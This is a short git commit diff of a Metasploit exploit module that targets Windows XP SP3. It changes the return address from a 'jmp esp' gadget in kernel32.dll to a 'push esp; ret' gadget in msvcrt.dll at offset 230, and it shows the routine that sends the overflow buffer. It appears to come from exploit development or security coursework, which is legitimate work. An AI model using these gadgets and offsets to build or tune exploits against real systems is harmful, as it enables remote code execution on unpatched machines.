changed return address
parent
f65e2ea923
commit
d64208a604
|
@ -47,7 +47,7 @@ class Metasploit4 < Msf::Exploit::Remote
|
|||
[
|
||||
[ 'Windows XP SP3',
|
||||
{
|
||||
'Ret' => 0x7c83c2c5, # jmp esp kernel32.dll
|
||||
'Ret' => 0x77c35459 , # push esp; ret - mscvrt.dll
|
||||
'Offset' => 230
|
||||
}
|
||||
],
|
||||
|
@ -75,5 +75,4 @@ class Metasploit4 < Msf::Exploit::Remote
|
|||
send_user(buf)
|
||||
disconnect
|
||||
end
|
||||
|
||||
end
|
||||
|
|
Loading…
Reference in New Issue